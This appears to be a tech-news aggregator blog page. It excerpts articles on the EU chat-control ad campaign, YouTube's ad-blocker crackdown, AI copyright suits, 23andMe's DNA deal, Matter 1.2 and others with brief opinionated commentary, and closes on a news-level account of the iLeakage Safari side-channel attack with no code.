EU Tries to Implement Client-Side Scanning (Death to Encryption) by Personalised Targeting of EU Residents With Misleading Ads

The EU Commission has been pushing client-side scanning for well over a year. This new intrusion into private communications has been pitched as perhaps the only way to prevent the sharing of child sexual abuse material (CSAM).

Mandates proposed by the EU government would have forced communication services to engage in client-side scanning of content. This would apply to every communication or service provider. But it would only negatively affect providers incapable of snooping on private communications because their services are encrypted.

Encryption — especially end-to-end encryption — protects the privacy and security of users. The EU’s pitch said protecting the children was paramount, even if it meant sacrificing the privacy and security of millions of EU residents.

Encrypted services would have been unable to comply with the mandate without stripping the client-side end from their end-to-end encryption. So, while it may have been referred to with the legislative euphemism “chat control” by EU lawmakers, the reality of the situation was that this bill — if passed intact — basically would have outlawed E2EE.

Fortunately, there was a lot of pushback. Some of it came from service providers who informed the EU they would no longer offer their services in EU member countries if they were required to undermine the security they provided for their users.

The more unexpected resistance came from EU member countries who similarly saw the gaping security hole this law would create and wanted nothing to do with it. On top of that, the EU government’s own lawyers told the Commission passing this law would mean violating other laws passed by this same governing body.

This pushback was greeted by increasingly nonsensical assertions by the bill’s supporters. In op-eds and public statements, backers insisted everyone else was wrong and/or didn’t care enough about the well-being of children to subject every user of any communication service to additional government surveillance.

That’s what happened on the front end of this push to create a client-side scanning mandate. On the back end, however, the EU government was trying to dupe people into supporting their own surveillance with misleading ads that targeted people most likely to believe any sacrifice of their own was worth making when children were on the (proverbial) line.

That’s the unsettling news being delivered to us by Vas Panagiotopoulos for Wired. A security researcher based in Amsterdam took a long look at apparently misleading ads that began appearing on Twitter as the EU government amped up its push to outlaw encryption.

Danny Mekić was digging into the EU’s “chat control” law when he began seeing disturbing ads on Twitter. These ads featured young women being (apparently) menaced by sinister men, backed by a similarly dark background and soundtrack. The ads displayed some supposed “facts” about the sexual abuse of children and ended with the notice that the ads had been paid for by the EU Commission.

The ads also cited survey results that supposedly said most European citizens supported client-side scanning of content and communications, apparently willing to sacrifice their own privacy and security for the common good.

But Mekić dug deeper and discovered the cited survey wasn’t on the level.

Following closer inspection, he discovered that these findings appeared biased and otherwise flawed. The survey results were gathered by misleading the participants, he claims, which in turn may have misled the recipients of the ads; the conclusion that EU citizens were fine with greater surveillance couldn’t be drawn from the survey, and the findings clashed with those of independent polls.

This discovery prompted Mekić to dig even deeper. What he found was that the ads were very tightly targeted — so tightly targeted, in fact, that they could not have been deployed in this manner without violating European laws aimed at preventing exactly this sort of targeting, i.e. targeting that uses “sensitive data” like religious beliefs and political affiliations.

The ads were extremely targeted, meant to find people most likely to be swayed towards the EU Commission’s side, either because the targets never appeared to distrust their respective governments or because their governments had yet to tell the EU Commission to drop its proposed anti-encryption proposal.

Mekić found that the ads were meant to be seen by select targets, such as top ministry officials, while they were concealed from people interested in Julian Assange, Brexit, EU corruption, Eurosceptic politicians (Marine Le Pen, Nigel Farage, Viktor Orban, Giorgia Meloni), the German right-wing populist party AfD, and “anti-Christians.”

Mekić then found out that the ads, which have garnered at least 4 million views, were only displayed in seven EU countries: the Netherlands, Sweden, Belgium, Finland, Slovenia, Portugal, and the Czech Republic.

A document leaked earlier this year exposed which EU members were in favor of client-side scanning and its attendant encryption backdoors, as well as those who thought the proposed mandate was completely untenable.

The countries targeted by the EU Commission ad campaign are, for the most part, supportive of/indifferent to broken encryption, client-side scanning, and expanded surveillance powers. Slovenia (along with Spain, Cyprus, Lithuania, Croatia, and Hungary) was firmly in favor of bringing an end to end-to-end encryption.

[…]

While we’re accustomed to politicians airing misleading ads during election runs, this is something different. This is the representative government of several nations deliberately targeting countries and residents it apparently thinks might be receptive to its skewed version of the facts, which comes in the form of the presentation of misleading survey results against a backdrop of heavily-implied menace. And that’s on top of seeming violations of privacy laws regarding targeted ads that this same government body created and ratified.

It’s a tacit admission EU proposal backers think they can’t win this thing on its merits. And they can’t. The EU Commission has finally ditched its anti-encryption mandates after months of backlash. For the moment, E2EE survives in Europe. But it’s definitely still under fire. The next exploitable tragedy will bring with it calls to reinstate this part of the “chat control” proposal. It will never go away because far too many governments believe their citizens are obligated to let these governments shoulder-surf whenever they deem it necessary. And about the only thing standing between citizens and that unceasing government desire is end-to-end encryption.

Source: EU Pitched Client-Side Scanning By Targeting Certain EU Residents With Misleading Ads | Techdirt

As soon as you read that legislation is ‘for the kids’, be very, very wary – it’s usually for something completely beyond that remit. And this kind of legislation is the installation of Big Brother on every single communications line you use.

YouTube is cracking down on ad blockers globally. Time to go to the next video site. Vimeo, are you listening?

YouTube is no longer preventing just a small subset of its userbase from accessing its videos if they have an ad blocker. The platform has gone all out in its fight against the use of add-ons, extensions and programs that prevent it from serving ads to viewers around the world, it confirmed to Engadget. “The use of ad blockers violate YouTube’s Terms of Service,” a spokesperson told us. “We’ve launched a global effort to urge viewers with ad blockers enabled to allow ads on YouTube or try YouTube Premium for an ad free experience. Ads support a diverse ecosystem of creators globally and allow billions to access their favorite content on YouTube.”

YouTube started cracking down on the use of ad blockers earlier this year. It initially showed pop-ups telling users that ad blocking is against the website’s TOS, and then it put a timer on those notifications to make sure people read them. By June, it took a more aggressive approach and warned viewers that they wouldn’t be able to play more than three videos unless they disabled their ad blockers. That was a “small experiment” meant to urge users to enable ads or to try YouTube Premium, which the website has now expanded to its entire userbase. Some people can’t play videos in Microsoft Edge and Firefox even when they don’t have ad blockers, according to Android Police, but we weren’t able to replicate that behavior. [Note – I was!]

People are unsurprisingly unhappy about the development and have taken to social networks like Reddit to air their grievances. If they don’t want to enable ads, after all, the only way they can watch videos with no interruptions is to pay for a YouTube Premium subscription. Indeed, the notification viewers get heavily promotes the subscription service. “Ads allow YouTube to stay free for billions of users worldwide,” it says. But with YouTube Premium, viewers can go ad-free, and “creators can still get paid from [their] subscription.”

[…]

Source: YouTube is cracking down on ad blockers globally

It doesn’t help YouTube much that the method they have of detecting your ad blocker basically comes down to using spyware. Source: Privacy advocate challenges YouTube’s ad blocking detection (which isn’t spyware)

Mass lawsuit against Apple over throttled and broken iPhone batteries can go ahead, London tribunal rules

Apple Inc (AAPL.O) on Wednesday lost a bid to block a mass London lawsuit worth up to $2 billion which accuses the tech giant of hiding defective batteries in millions of iPhones.

The lawsuit was brought by British consumer champion Justin Gutmann on behalf of around 24 million iPhone users in the United Kingdom.

Gutmann is seeking damages from Apple on their behalf of up to 1.6 billion pounds ($1.9 billion) plus interest, with the claim’s midpoint range being 853 million pounds.

His lawyers argued Apple concealed issues with batteries in certain phone models by “throttling” them with software updates and installed a power management tool which limited performance.

Apple, however, said the lawsuit was “baseless” and strongly denied batteries in iPhones were defective, apart from in a small number of iPhone 6s models for which it offered free battery replacements.

[…]

Source: Mass lawsuit against Apple over iPhone batteries can go ahead, London tribunal rules | Reuters

Black 4.0 Is The New Ultrablack paint

Vantablack is a special coating material, more so than a paint. It’s well-known as one of the blackest coatings around, capable of absorbing almost all visible light in its complex nanotube structure. However, it’s complicated to apply, delicate, and not readily available, especially to those in the art world.

It was these drawbacks that led Stuart Semple to create his own incredibly black paint. Over the years, he’s refined the formula and improved its performance, steadily building a better product that’s available to all. His latest effort is Black 4.0, and it’s promising to be the black paint to dominate all others.

Back in Black

This journey began in a wonderfully spiteful fashion. Upon hearing that one Anish Kapoor had secured exclusive rights to be the sole artistic user of Vantablack, Semple determined that something had to be done. Seven years ago, he set out to create his own ultra black paint that would far outperform conventional black paints on the market. Since his first release, he’s been delivering black paints that suck in more light and simply look blacker than anything else out there.

Black 4.0 has upped the ante to a new level. Speaking to Hackaday, Semple explained the performance of the new paint, being sold through his Culture Hustle website. “Black 4.0 absorbs an astonishing 99.95% of visible light which is about as close to full light absorption as you’ll ever get in a paint,” said Semple. He notes this outperforms Vantablack’s S-Vis spray-on product, which only achieves 99.8%, as did his previous Black 3.0 paint. Those numbers are impressive, and we’d dearly love to see the new paint put to the test against other options in the ultra black market.

It might sound like mere fractional percentages, but it makes a difference. In sample tests, the new paint is more capable of fun visual effects since it absorbs yet more light. Under indoor lighting conditions, an item coated in Black 4.0 can appear to have no surface texture at all, looking to be a near-featureless black hole. Place an object covered in Black 4.0 on a surface coated in the same, and it virtually disappears. All the usual reflections and shadows that help us understand 3D geometry simply get sucked into the overwhelming blackness.

Black 4.0 compared to a typical black acrylic art paint. Credit: Stuart Semple

Beyond its greater light absorption, the paint has also seen a usability upgrade over Semple’s past releases. For many use cases, a single coat is all that’s needed. “It feels much nicer to use, it’s much more stable, more durable, and obviously much blacker,” he says, adding “The 3.0 would occasionally separate and on rare occasions collect little salt crystals at the surface, that’s all gone now.”

The added performance comes down to a new formulation of the paint’s “super-base” resin, which carries the pigment and mattifying compounds that give the paint its rich, dreamy darkness. It’s seen a few ingredient substitutions compared to previous versions, but a process change also went a long way to creating an improved product. “The interesting thing is that although all that helped, it was the process we used to make the paint that gave us the breakthrough, the order we add things, the way we mix them, and the temperature,” Semple told Hackaday.

The ultra black paint has a way of making geometry disappear. Credit: Stuart Semple

Black 4.0 is more robust than previous iterations, but it’s still probably not up to a full-time life out in the elements, says Semple. You could certainly coat a car in it, for example, but it probably wouldn’t hold up in the long term. He’s particularly excited for applications in astronomy and photography, where the extremely black paint can help catch light leaks and improve the performance of telescopes and cameras. It’s also perfect for creating an ultra black photographic backdrop.

No special application methods are required; Black 4.0 can be brush painted just like its predecessors. Indeed, it absorbs so much light that you probably don’t need to worry as much about brush marks as you usually would. Other methods, like using rollers or airbrushes, are perfectly fine, too.

Creating such a high-performance black paint didn’t come without challenges, either. Along the way, Semple contended with canisters of paint exploding, legal threats from others in the market, and one of the main scientists leaving the project. Wrangling supplies of weird and wonderful ingredients was understandably difficult, too.  Nonetheless, he persevered, and has now managed to bring the first batches to market.

The first batches ship in November, so if you’re eager to get some of the dark stuff, you’d better move quick. It doesn’t come cheap, but you’re always going to pay more for something claiming to be the world’s best. If you’ve got big plans, fear not—this time out, Semple will sell the paint in huge bulk 1 liter and 6 liter containers if you really need a job lot. Have fun out there, and if you do something radical, you know who to tell about it.

Source: Black 4.0 Is The New Ultrablack | Hackaday

Posted in Art

Researchers devise method using mirrors to monitor nuclear stockpiles offsite

Researchers say they have developed a method to remotely track the movement of objects in a room using mirrors and radio waves, in the hope it could one day help monitor nuclear weapons stockpiles.

According to the non-profit org International Campaign to Abolish Nuclear Weapons, nine countries – Russia, the United States, China, France, the United Kingdom, Pakistan, India, Israel and North Korea – collectively own about 12,700 nuclear warheads.

Meanwhile, over 100 nations have signed the United Nations’ Treaty on the Prohibition of Nuclear Weapons, promising to not “develop, test, produce, acquire, possess, stockpile, use or threaten to use” the tools of mass destruction. Tracking signs of secret nuclear weapons development, or changes in existing warhead caches, can help governments identify entities breaking the rules.

A new technique devised by a team of researchers led by the Max Planck Institute for Security and Privacy (MPI-SP) aims to remotely monitor the removal of warheads stored in military bunkers. The scientists installed 20 adjustable mirrors and two antennae to monitor the movement of a blue barrel stored in a shipping container. One antenna emits radio waves that bounce off each mirror to create a unique reflection pattern detected by the other antenna.

The signals provide information on the location of objects in the room. Moving the objects or mirrors will produce a different reflection pattern. Experiments showed that the system was sensitive enough to detect whether the blue barrel had shifted by just a few millimetres. Now, the team reckons that it could be applied to monitor whether nuclear warheads have been removed from stockpiles.

At this point, readers may wonder why this tech is proposed for the job when CCTV, or Wi-Fi location, or any number of other observation techniques could do the same job.

The paper explains that the antenna-and-mirror technique doesn’t require secure communication channels or tamper-resistant sensor hardware. The paper’s authors argue it is also “robust against major physical and computational attacks.”

“Seventy percent of the world’s nuclear weapons are kept in storage for military reserve or awaiting dismantlement,” explained Sebastien Philippe, co-author of a research paper published in Nature Communications and an associate research scholar at the School of Public and International Affairs at Princeton University.

“The presence and number of such weapons at any given site cannot be verified easily via satellite imagery or other means that are unable to see into the storage vaults. Because of the difficulties to monitor them, these 9,000 nuclear weapons are not accounted for under existing nuclear arms control agreements. This new verification technology addresses this long-standing challenge and contributes to future diplomatic efforts that would seek to limit all nuclear weapon types,” he said in a statement.

In practice, officials from an organisation such as the UN-led International Atomic Energy Agency, which promotes peaceful uses of nuclear energy, could install the system in a nuclear bunker and measure the radio waves reflecting off its mirrors. The unique fingerprint signal can then be stored in a database.

They could later ask the government controlling the nuclear stockpile to measure the radio wave signal recorded by its detector antenna and compare it to the initial result to check whether any warheads have been moved.

If both measurements are the same, the nuclear weapon stockpile has not been tampered with. But if they’re different, it shows something is afoot. The method is only effective if the initial radio fingerprint detailing the original configuration of the warheads is kept secret, however.
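The verification step described above boils down to comparing a stored baseline fingerprint against a fresh measurement, allowing for ordinary noise. A minimal sketch of that comparison logic — the function name, tolerance value, and the modelling of a fingerprint as a vector of signal amplitudes are illustrative assumptions, not details from the paper:

```python
import math

def fingerprint_matches(baseline, measurement, tolerance=0.01):
    """Compare a stored radio-wave fingerprint against a fresh reading.

    Fingerprints are modelled here as lists of signal amplitudes produced
    by the mirror configuration; the tolerance absorbs measurement noise.
    (Illustrative model, not the paper's actual representation.)
    """
    if len(baseline) != len(measurement):
        return False
    # Euclidean distance between the two signal vectors
    distance = math.sqrt(sum((b - m) ** 2 for b, m in zip(baseline, measurement)))
    return distance <= tolerance

baseline = [0.52, 0.13, 0.88, 0.31]        # recorded at installation, kept secret
unchanged = [0.521, 0.129, 0.879, 0.310]   # later reading, warheads untouched
tampered = [0.52, 0.13, 0.61, 0.31]        # a mirror or object has moved

print(fingerprint_matches(baseline, unchanged))  # True: stockpile intact
print(fingerprint_matches(baseline, tampered))   # False: something moved
```

Note that, as the article stresses, this check is only meaningful if the baseline stays secret and the response comes back quickly enough that it can’t have been simulated.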

Unfortunately, it’s not quite foolproof, considering adversaries could technically use machine learning algorithms to predict how the positions of the mirrors generate the corresponding radio wave signal detected by the antenna.

“With 20 mirrors, it would take eight weeks for an attacker to decode the underlying mathematical function,” said Johannes Tobisch, co-author of the study and a researcher at the MPI-SP. “Because of the scalability of the system, it’s possible to increase the security factor even more.”

To prevent this, the researchers said that the verifier and prover should agree to send back a radio wave measurement within a short time frame, such as within a minute or so. “Beyond nuclear arms control verification, our inspection system could find application in the financial, information technology, energy, and art sectors,” they concluded in their paper.

“The ability to remotely and securely monitor activities and assets is likely to become more important in a world that is increasingly networked and where physical travel and on-site access may be unnecessary or even discouraged.”

Source: Researchers devise new method to monitor nuclear stockpiles • The Register

Judge dismisses most of artists’ AI copyright lawsuits against Midjourney, Stability AI

A judge in California federal court on Monday trimmed a lawsuit by visual artists who accuse Stability AI, Midjourney and DeviantArt of misusing their copyrighted work in connection with the companies’ generative artificial intelligence systems.

U.S. District Judge William Orrick dismissed some claims from the proposed class action brought by Sarah Andersen, Kelly McKernan and Karla Ortiz, including all of the allegations against Midjourney and DeviantArt. The judge said the artists could file an amended complaint against the two companies, whose systems utilize Stability’s Stable Diffusion text-to-image technology.

Orrick also dismissed McKernan and Ortiz’s copyright infringement claims entirely. The judge allowed Andersen to continue pursuing her key claim that Stability’s alleged use of her work to train Stable Diffusion infringed her copyrights.

The same allegation is at the heart of other lawsuits brought by artists, authors and other copyright owners against generative AI companies.

“Even Stability recognizes that determination of the truth of these allegations – whether copying in violation of the Copyright Act occurred in the context of training Stable Diffusion or occurs when Stable Diffusion is run – cannot be resolved at this juncture,” Orrick said.

The artists’ attorneys Joseph Saveri and Matthew Butterick said in a statement that their “core claim” survived, and that they were confident that they could address the court’s concerns about their other claims in an amended complaint to be filed next month.

A spokesperson for Stability declined to comment on the decision. Representatives for Midjourney and DeviantArt did not immediately respond to requests for comment.

The artists said in their January complaint that Stability used billions of images “scraped” from the internet, including theirs, without permission to teach Stable Diffusion to create its own images.

Orrick agreed with all three companies that the images the systems actually created likely did not infringe the artists’ copyrights. He allowed the claims to be amended but said he was “not convinced” that allegations based on the systems’ output could survive without showing that the images were substantially similar to the artists’ work.

The judge also dismissed other claims from the artists, including that the companies violated their publicity rights and competed with them unfairly, with permission to refile.

Orrick dismissed McKernan and Ortiz’s copyright claims because they had not registered their images with the U.S. Copyright Office, a requirement for bringing a copyright lawsuit.

The case is Andersen v. Stability AI Ltd, U.S. District Court for the Northern District of California, No. 3:23-cv-00201.

For the artists: Joseph Saveri of Joseph Saveri Law Firm; and Matthew Butterick

For Stability: Paul Schoenhard of Fried Frank Harris Shriver & Jacobson

For Midjourney: Angela Dunning of Cleary Gottlieb Steen & Hamilton

For DeviantArt: Andy Gass of Latham & Watkins

Read more:

Lawsuits accuse AI content creators of misusing copyrighted work

AI companies ask U.S. court to dismiss artists’ copyright lawsuit

US judge finds flaws in artists’ lawsuit against AI companies

Source: Judge pares down artists’ AI copyright lawsuit against Midjourney, Stability AI | Reuters

These suits are absolute nonsense. It’s like suing a person for having seen some art and made something a bit like it. It’s not very surprising that this has been wiped off the table.

Drugmakers Are Set To Pay 23andMe Millions To Access Your DNA – Which Is Also Your Family’s DNA

GSK will pay 23andMe $20 million for access to the genetic-testing company’s vast trove of consumer DNA data, extending a five-year collaboration that’s allowed the drugmaker to mine genetic data as it researches new medications.

Under the new agreement, 23andMe will provide GSK with one year of access to anonymized DNA data from the approximately 80% of gene-testing customers who have agreed to share their information for research, 23andMe said in a statement Monday. The genetic-testing company will also provide data-analysis services to GSK.

23andMe is best known for its DNA-testing kits that give customers ancestry and health information. But the DNA it collects is also valuable, including for scientific research. With information from more than 14 million customers, the only data sets that rival the size of the 23andMe library belong to Ancestry.com and the Chinese government. The idea for drugmakers is to comb the data for hints about genetic pathways that might be at the root of disease, which could significantly speed up the long, slow process of drug development. GSK and 23andMe have already taken one potential medication to clinical trials: a cancer drug that works to block CD96, a protein that helps modulate the body’s immune responses. It entered that testing phase in four years, compared to an industry average of about seven years. Overall, the partnership between GSK and 23andMe has produced more than 50 new drug targets, according to the statement.

The new agreement changes some components of the collaboration. Any discoveries GSK makes with the 23andMe data will now be solely owned by the British pharmaceutical giant, while the genetic-testing company will be eligible for royalties on some projects. In the past, the two companies pursued new drug targets jointly. GSK’s new deal with 23andMe is also non-exclusive, leaving the genetic-testing company free to license its database to other drugmakers.

Source: Drugmakers Are Set To Pay 23andMe Millions To Access Consumer DNA – Slashdot

So – you paid for a DNA test and it turns out you didn’t think of the privacy aspect at all. Neither did you consider that you also gave up your family’s DNA, or that you can’t actually change your DNA. Well done. It’s being spread all over the place. And no, the data is not anonymous – DNA is the most personal information you can ever give up.

Particle Accelerator can now be built on a Chip

Particle accelerators range in size from a room to a city. However, now scientists are looking closer at chip-sized electron accelerators, a new study finds. Potential near-term applications for the technology include radiation therapy for zapping skin cancer and, longer-term, new kinds of laser and light sources.

Particle accelerators generally propel particles within metal tubes or rings. The rate at which they can accelerate particles is limited by the peak fields the metallic surfaces can withstand. Conventional accelerators range in size from a few meters for medical applications to kilometers for fundamental research. The fields they use are often on the scale of millions of volts per meter.

In contrast, electrically insulating dielectric materials (stuff that doesn’t conduct electricity well but does support electrostatic fields well) can withstand light fields thousands of times stronger. This has led scientists to investigate creating dielectric accelerators that rely on lasers to hurl particles.

[…]

Physicists fabricated a tiny channel 225 nanometers wide and up to 0.5 millimeters long. An electron beam entered one end of the channel and exited the other end.

The researchers shone infrared laser pulses 250 femtoseconds long on top of the channel to help accelerate electrons down it. Inside the channel, two rows of up to 733 silicon pillars, each 2 micrometers high, interacted with these laser pulses to generate accelerating forces.

The electrons entered the accelerators with an energy of 28,400 electron-volts, traveling at roughly one-third the speed of light. They exited it with an energy of 40,700 electron-volts, a 43 percent boost in energy.
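As a quick sanity check, the reported entry and exit energies do work out to roughly a 43 percent gain:

```python
# Energies reported in the study, in electron-volts
entry_energy = 28_400
exit_energy = 40_700

gain = exit_energy - entry_energy          # 12,300 eV gained in the channel
boost_percent = 100 * gain / entry_energy  # relative energy boost

print(f"{boost_percent:.0f}%")  # → 43%
```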

This new type of particle accelerator can be built using standard cleanroom techniques, such as electron beam lithography. “This is why we think that our results represent a big step forward,” Hommelhoff says. “Everyone can go ahead and start engineering useful machines from this.”

[…]

Applications for these nanophotonic electron accelerators depend on the energies they can reach. Electrons of up to about 300,000 electron-volts are typical for electron microscopy, Hommelhoff says. For treatment of skin cancer, 10 million electron-volt electrons are needed. Whereas such medical applications currently require an accelerator 1 meter wide, as well as additional large, heavy and expensive parts to help drive the accelerator, “we could in principle get rid of both and have just a roughly 1-centimeter chip with a few extra centimeters for the electron source,” adds study lead author Tomáš Chlouba, a physicist at the University of Erlangen-Nuremberg in Germany.

Applications such as synchrotron light sources, free electron lasers, and searches for lightweight dark matter appear with billion electron-volt electrons. With trillion electron-volt electrons, high-energy colliders become possible, Hommelhoff says.

The scientists note there are many ways to improve their device beyond their initial proof-of-concept structures. They now aim to experiment with greater acceleration and higher electron currents to help enable applications, as well as boosting output by fabricating many accelerator channels next to each other that can all be driven by the same laser pulses.

In addition, although the new study experimented with structures made from silicon due to the relative ease of working with it, “silicon is not really a high-damage threshold material,” Hommelhoff says. Structures made of glass or other materials may allow much stronger laser pulses and thus more powerful acceleration, he says.

The researchers are interested in building a small-scale accelerator, “maybe with skin cancer treatment applications in mind first,” Hommelhoff says. “This is certainly something that we should soon transfer to a startup company.”

The scientists detailed their findings in the 19 October issue of the journal Nature.

Source: Particle Accelerator on a Chip Hits Penny-Size – IEEE Spectrum

Google CEO Defends Paying $26b in 2021 to Remain Top Search Engine

Google CEO Sundar Pichai upheld the company’s decision to pay out billions of dollars to remain the top global search engine at the U.S. anti-trust trial on Monday, according to a report from The Wall Street Journal. Pichai claimed he tried to give users a “seamless and easy” experience, even if it meant paying Apple and other tech companies an exorbitant fee.

The U.S. Department of Justice is arguing that Google created the building blocks to hold a monopoly over the market, but Pichai disagrees, saying the company is the dominant search engine because it is better than its competitors.

“We realized early on that browsers are critical to how people are able to navigate and use the web,” Pichai said during questioning, as reported by The Journal. “It became very clear early on that if you make the user’s experience better, they would use the web more, they would enjoy using the web more, and they would search more in Google as well.”

Pichai testified that Google’s payments to phone companies and manufacturers were meant to push them toward more security upgrades and not just enabling Google to be the primary search engine.

Internal emails between Pichai and his colleagues from 2007, shared during cross-examination, revealed Google’s insistence on being Apple’s default search engine. Pichai said he was worried about Google being the only search engine offered and requested a Yahoo backup version.

Google paid Apple a reported $18 billion to remain the default search engine on its Macs, iPhones, and iPads in 2021, and paid tech companies a grand total of $26 billion in 2021 alone, according to court documents.

[…]

Source: Google CEO Defends Paying Billions to Remain Top Search Engine

Apple says BMW wireless chargers really are messing with iPhone 15s

Users have been reporting that their iPhone 15s’ NFC chips were failing after using BMW’s in-car wireless charging, but until now, Apple hadn’t addressed the complaints. That seems to have changed: MacRumors reported this week that an internal Apple memo to third-party repair providers says a software update later this year should prevent a “small number” of in-car wireless chargers from “temporarily” disabling iPhone 15 NFC chips.

Apple reportedly says that until the fix comes out, anyone who experiences this should not use the wireless charger in their car. Users have been complaining about BMW wireless chargers breaking Apple Pay and the BMW digital key feature in posts on Reddit, Apple’s Support community, and MacRumors’ own forums.

BMW seemed to acknowledge the issue earlier this month, when the BMW UK X account replied to a complaint saying the company is working with Apple to investigate. There’s no easy way to know which models are affected, so for now, if you have a BMW or a Toyota Supra with a wireless charger, it’s probably best to just avoid using it until the problem is fixed.

Source: Apple says BMW wireless chargers really are messing with iPhone 15s – The Verge

IoT standard Matter 1.2 released

[…] Matter, version 1.2, is now available for device makers and platforms to build into their products. It is packed with nine new device types, revisions, and additions to existing categories, core improvements to the specification and SDK, and certification and testing tools. The Matter 1.2 certification program is now open and members expect to bring these enhancements and new device types to market later this year and into 2024 and beyond.

[…]

The new device types supported in Matter 1.2 include:

  1. Refrigerators – Beyond basic temperature control and monitoring, this device type is also applicable to other related devices like deep freezers and even wine and kimchi fridges.
  2. Room Air Conditioners – While HVAC and thermostats were already part of Matter 1.0, standalone Room Air Conditioners with temperature and fan mode control are now supported.
  3. Dishwashers – Basic functionality is included, like remote start and progress notifications. Dishwasher alarms are also supported, covering operational errors such as water supply and drain, temperature, and door lock errors.
  4. Laundry Washers – Progress notifications, such as cycle completion, can be sent via Matter. Dryers will be supported in a future Matter release.
  5. Robotic Vacuums – Beyond the basic features like remote start and progress notifications, there is support for key features like cleaning modes (dry vacuum vs wet mopping) and additional status details (brush status, error reporting, charging status).
  6. Smoke & Carbon Monoxide Alarms – These alarms will support notifications and audio and visual alarm signaling. Additionally, there is support for alerts about battery status and end-of-life notifications. These alarms also support self-testing. Carbon monoxide alarms support concentration sensing, as an additional data point.
  7. Air Quality Sensors – Supported sensors can capture and report on: PM1, PM2.5, PM10, CO2, NO2, VOC, CO, Ozone, Radon, and Formaldehyde. Furthermore, the addition of the Air Quality Cluster enables Matter devices to provide AQI information based on the device’s location.
  8. Air Purifiers – Purifiers utilize the Air Quality Sensor device type to provide sensing information and also include functionality from other device types like Fans (required) and Thermostats (optional). Air purifiers also include consumable resource monitoring, enabling notifications on filter status (both HEPA and activated carbon filters are supported in 1.2).
  9. Fans – Matter 1.2 includes support for fans as a separate, certifiable device type. Fans now support movements like rock/oscillation and new modes like natural wind and sleep wind. Additional enhancements include the ability to change the airflow direction (forward and reverse) and step commands to change the speed of airflow. […]
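For a sense of what the AQI reporting in item 7 involves, here is a sketch of the widely used US EPA conversion from a PM2.5 reading to an AQI value. The breakpoint table and function are illustrative of that general method, not part of the Matter specification, which leaves the AQI calculation to the device.

```python
# Illustrative US EPA AQI calculation from a 24-hour PM2.5 concentration
# (ug/m^3). Matter's Air Quality Cluster reports an AQI computed by the
# device; the exact method is implementation- and region-specific, so
# this sketch uses the well-known EPA breakpoint interpolation as one
# example.

# (C_lo, C_hi, I_lo, I_hi) breakpoints for 24-hour PM2.5, per US EPA.
PM25_BREAKPOINTS = [
    (0.0, 12.0, 0, 50),        # Good
    (12.1, 35.4, 51, 100),     # Moderate
    (35.5, 55.4, 101, 150),    # Unhealthy for sensitive groups
    (55.5, 150.4, 151, 200),   # Unhealthy
    (150.5, 250.4, 201, 300),  # Very unhealthy
    (250.5, 500.4, 301, 500),  # Hazardous
]

def pm25_to_aqi(conc: float) -> int:
    """Linearly interpolate an AQI value from a PM2.5 concentration."""
    for c_lo, c_hi, i_lo, i_hi in PM25_BREAKPOINTS:
        if c_lo <= conc <= c_hi:
            return round((i_hi - i_lo) / (c_hi - c_lo) * (conc - c_lo) + i_lo)
    raise ValueError("concentration out of range")
```

A reading of 40 ug/m³ falls in the third band and maps to an AQI in the 101–150 "unhealthy for sensitive groups" range.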

Core improvements to the Matter 1.2 specification include:

  • Latch & Bolt Door Locks – Enhancements for European markets that capture the common configuration of a combined latch and bolt lock unit.
  • Device Appearance – Added description of device appearance, so that devices can describe their color and finish. This will enable helpful representations of devices across clients.
  • Device & Endpoint Composition – Devices can now be hierarchically composed from complex endpoints allowing for accurate modeling of appliances, multi-unit switches, and multi-light fixtures.
  • Semantic Tags – Provide an interoperable way to describe the location and semantic functions of generic Matter clusters and endpoints to enable consistent rendering and application across the different clients. For example, semantic tags can be used to represent the location and function of each button on a multi-button remote control.
  • Generic Descriptions of Device Operational States – Expressing the different operational modes of a device in a generic way will make it easier to generate new device types in future revisions of Matter and ensure their basic support across various clients.
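As a rough illustration of the hierarchical composition idea described above, this sketch models a fridge/freezer combination as one device composed of child endpoints. The class and field names are hypothetical, not the Matter SDK’s API.

```python
from dataclasses import dataclass, field

# Hypothetical sketch of Matter 1.2's hierarchical endpoint composition
# (names are illustrative, not SDK API): a composed device exposes child
# endpoints, each with its own device type, so a fridge/freezer combo can
# be modeled accurately as one node with two temperature zones.

@dataclass
class Endpoint:
    id: int
    device_type: str
    parts: list["Endpoint"] = field(default_factory=list)

fridge = Endpoint(1, "Refrigerator", parts=[
    Endpoint(2, "Temperature Controlled Cabinet (fridge)"),
    Endpoint(3, "Temperature Controlled Cabinet (freezer)"),
])

def flatten(ep: Endpoint) -> list[int]:
    """List all endpoint IDs in a composed device, root first."""
    return [ep.id] + [i for p in ep.parts for i in flatten(p)]
```

A controller walking the tree sees all three endpoints, while the root endpoint still represents the appliance as a whole.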

Under-the-Hood Enhancements: Matter SDK & Test Harness

Matter 1.2 brings important enhancements in the testing and certification program which helps companies bring products – hardware, software, chipsets and apps – to market faster. These improvements will benefit the wider developer community and ecosystem around Matter.

  • New Platform Support in SDK – Matter 1.2 SDK is now available for new platforms providing more ways for developers to build new products for Matter.
  • Enhancements to the Matter Test Harness – The Test Harness is a critical piece for ensuring the specification and its features are being implemented correctly. The Test Harness is now available via open source, making it easier for Matter developers to contribute to the tools (to make them better) and to ensure they are working with the latest version (with all features and bug fixes).

[…]

Developers interested in learning more about these enhancements can access the following resources:

[…]

Source: Matter 1.2 Arrives with Nine New Device Types – CSA-IOT

iLeakage hack can force iOS and macOS browsers to divulge passwords and much more

Researchers have devised an attack that forces Apple’s Safari browser to divulge passwords, Gmail message content, and other secrets by exploiting a side channel vulnerability in the A- and M-series CPUs running modern iOS and macOS devices.

 

iLeakage, as the academic researchers have named the attack, is practical and requires minimal resources to carry out. It does, however, require extensive reverse-engineering of Apple hardware and significant expertise in exploiting a class of vulnerability known as a side channel, which leaks secrets based on clues left in electromagnetic emanations, data caches, or other manifestations of a targeted system. The side channel in this case is speculative execution, a performance enhancement feature found in modern CPUs that has formed the basis of a wide corpus of attacks in recent years. The nearly endless stream of exploit variants has left chip makers—primarily Intel and, to a lesser extent, AMD—scrambling to devise mitigations.

Exploiting WebKit on Apple silicon

The researchers implement iLeakage as a website. When visited by a vulnerable macOS or iOS device, the website uses JavaScript to surreptitiously open a separate website of the attacker’s choice and recover site content rendered in a pop-up window. The researchers have successfully leveraged iLeakage to recover YouTube viewing history, the content of a Gmail inbox—when a target is logged in—and a password as it’s being autofilled by a credential manager. Once visited, the iLeakage site requires about five minutes to profile the target machine and, on average, roughly another 30 seconds to extract a 512-bit secret, such as a 64-character string.

Top: An email displayed in Gmail’s web view. Bottom: Recovered sender address, subject, and content.
Kim, et al.

